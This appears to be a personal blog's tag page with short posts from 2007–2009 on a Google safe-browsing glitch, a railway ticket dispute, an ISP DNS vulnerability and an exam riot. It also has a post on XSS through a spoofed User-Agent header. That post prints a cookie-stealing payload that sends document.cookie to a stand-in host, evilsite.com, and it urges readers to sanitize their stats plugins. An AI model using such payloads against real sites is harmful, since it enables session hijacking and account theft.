Posts tagged Bad World
When the Internet is ‘no’ longer safe

Yes. Internet has never been safer, but only few things on it. Now, Google shows that everything in the world is a Harmful Site.

Crazy Google

As some great fellow told, ‘No computer safe is unless it has been switched off, hidden few meters underground’ – Google has been ‘compromised’.

Edit: Google posted on their blog about the problem and itseems the problem was human error processing the list from StopBadware.org, Once again Google saves the day. It wasn’t compromised.

Posted on Sunday, 1 February 2009
Filed ↓ Bad WorldCompromisedGoogleHarmful
Comments
Meeting with Lord Counter Guy

I had a ‘weird’ experience today with Indian Railways. I don’t understand what exactly is wrong with our guys (or with me for not being able to understand this) Here is the scene.

  1. I’m in a hurry
  2. I need to buy ticket for traveling from Tirupati to Madras
  3. Ticket Fare is 46/-
  4. They don’t accept credit/debit cards
  5. Not all will have exact 6 rupees change with them, some times not even a rupee coin
I stood in the counter and gave him 100/- and asked for ticket. He politely asked me to give a rupee coin and take my ticket. Well, I don’t have it (Not having is my mistake. I accept) I asked him to keep to change (remaining 4/-) and give me the ticket and fifty rupees note. Now, that guy thinks that he is ***** (insert whatever he thinks about himself) and he cannot accept extra 4 rupees. And he gave my 100/- back and asked me to get 46/- exact fare.
  • Well, come on – I’m not giving any TIP to him. In fact, I think he might be earning more than me (he is a frigging central government employee) I’m not an arrogant bugger to tip rich folks.
  • I just asked him to add the 4 rupees to the counter money as I don’t have any change. I’m willing to lose my 4 rupees as not having change is my mistake.
  • That guy with all his ego knowing one fact that I cannot travel without buying a ticket rejected to sell me the ticket unless I give him 46/- exact fare.
  • In simple words – he is willing to cause inconvenience to a passenger but won’t add profit to the Railways because of his ego.
  • I still cannot understand what was his problem in taking 4 rupees extra and add to the counter money. – Yes, he can adjust it to other guys who end up there with few rupees less. If he cannot take 4 rupees extra, how about giving me ticket for 1 rupee less fare ? (I don’t have any ego issues about taking a rupee from Lord Counter Guy)  No, he wont do it. I’ve seen so many times in the same counter where they send away people as they have few rupees less than the fare money. I even gave 3/- to an old traveler once when these guys rejected to give her ticket as she had ₨. 3/- less than the fare.
BTW, few of you folks might be thinking that Queues are long in India, so they want exact fare otherwise it is troublesome, well, there were only 3 guys standing in the queue ( may be because of today’s solar eclipse, not many travelers were there) Seriously, our guys should grow up and stop troubling a person just because they can trouble. I had to run to a shop and buy chewing gum for that 1 rupee change. Railways should consider accepting credit cards in the counter. There is atleast 10% of passenger population who should be willing to swipe their cards rather than running and getting coins for the ‘lords’ sitting in the counter. I don’t want to trouble another guy for today’s guy’s mistake. Otherwise, next time I would be buying my ticket with 46 one rupee coins or 92 fifty paisa coins or a combination of both – just to give him exact change.

Posted on Tuesday, 27 January 2009
Filed ↓ Bad WorldExperienceIdiotRailways
Comments
DNS Vulnerability and our stupid ISPs

Guess you know what is DNS ?
If you don’t know what it is …
Its Domain Name System. All the servers will have some set of numbers to identify them (IP), to recognize them easily we give them a name (domain name) and for internet to work, DNS maps these names to numbers. (Duh, read wikipedia for more info)

For the techie folks who know whats DNS, you might have missed this news. There was a bug. It was just a bug when people din’t know. Few days before , its was a problem as bad people know that it exists. And couple of days before, it became a major problem as bad people got to know how to tame the bug and exploit it. And today, its frigging Pain in the A** as our dumb ISPs are not fixing their DNS servers.

Well, the bug is that bad people can manipulate DNS lookups. Which literally means, when you open Google.com, then can send you to Yahoo.com too. Search engines need not be a problem, but if they manipulate DNS of a bank … the answer is … somebody is gonna get hurt real badddddd

So, I request you to check (@Doxpara) whether your DNS server is vulnerable to such bug or not, and if it is, change it to OpenDNS (208.67.222.222 and 208.67.220.220) and stay secure. As of today, I’ve tested BSNL and Airtel DNS servers (Chennai) and both of them are vulnerable. Guess, we need to take a huge rod and shove it up into someone’s a** and make them fix their DNS servers so that we can stay secure.

For extra-super-terrestial technical folks, I need not tell you about this, but incase you missed it, check (@Securebits) the exploiter released.

Posted on Saturday, 2 August 2008
Filed ↓ Bad WorldInternetNewsSpoofingTheyWTF
Comments
WTF ??????

Here are the keywords for the story.

  • Bihar
  • Students
  • Angry
  • Law
  • Exams
  • Rampage
  • Boycott
  • WTF ????

Here is the story.

Hundreds of law students in Bihar went on a rampage. Because of some issues while conduction of exams.

  1. No water
  2. No shade
  3. No quiet environment
  4. No white papers
  5. No chairs
  6. No tables

None of the above is the reason for those students’ anger. The reason is …

“They are denied to carry books, copies and mobile phones into the examination hall to COPY write their exam”

Yeah, sounds crazy, but that is the reason. This sounds even more crazy when you get to know that they actually set office and classrooms on fire because of that. Want to know the craziest thing of all .. All those students who wanted “unfair” means in writing their exams are …. LAW Students. Yeah !!! They are going to deliver justice in the court of law.

God bless India.

Posted on Sunday, 3 February 2008
Filed ↓ Bad WorldWTF
Comments
Funny way for XSS

Well, its just not funny way, but very funny way. Neither through a HTTP GET nor a HTTP POST. But, it’s through a header. I haven’t read about this method of XSS up to now, but seriously, its silly and common. Usually webmasters read about the traffic of their websites and Referrer, User-Agent are very common headers they analyze to know the type of visitors and from which site they are coming.

I just spoofed my User-Agent header to “<script>alert(1)</script>”, and when I saw the stats page after that guess what, my stats plugin wasn’t sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care about looking at your stats (especially in wordpress). One can rather keeping an alert, can keep some thing like this

<img
src=”javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;”
style=visibility:hidden />

The above code will send the cookie to cookie.php page of evilsite.com and the hacker can collect the cookies there using a very simple code and he can become you just by using those cookies. This page has many vectors to use. It doesn’t teach you how to use, so, if you really know what you have to do, you must be knowing this page already.

Result, check your stats plugins and make sure that they are sanitizing all the inputs. Just don’t trust them. They can be very dangerous. Finishing yet another episode of “How do THEY do it ?”

Posted on Monday, 19 November 2007
Filed ↓ Bad WorldSpoofingTechTipsThey
Comments
Older »
Page 1 of 4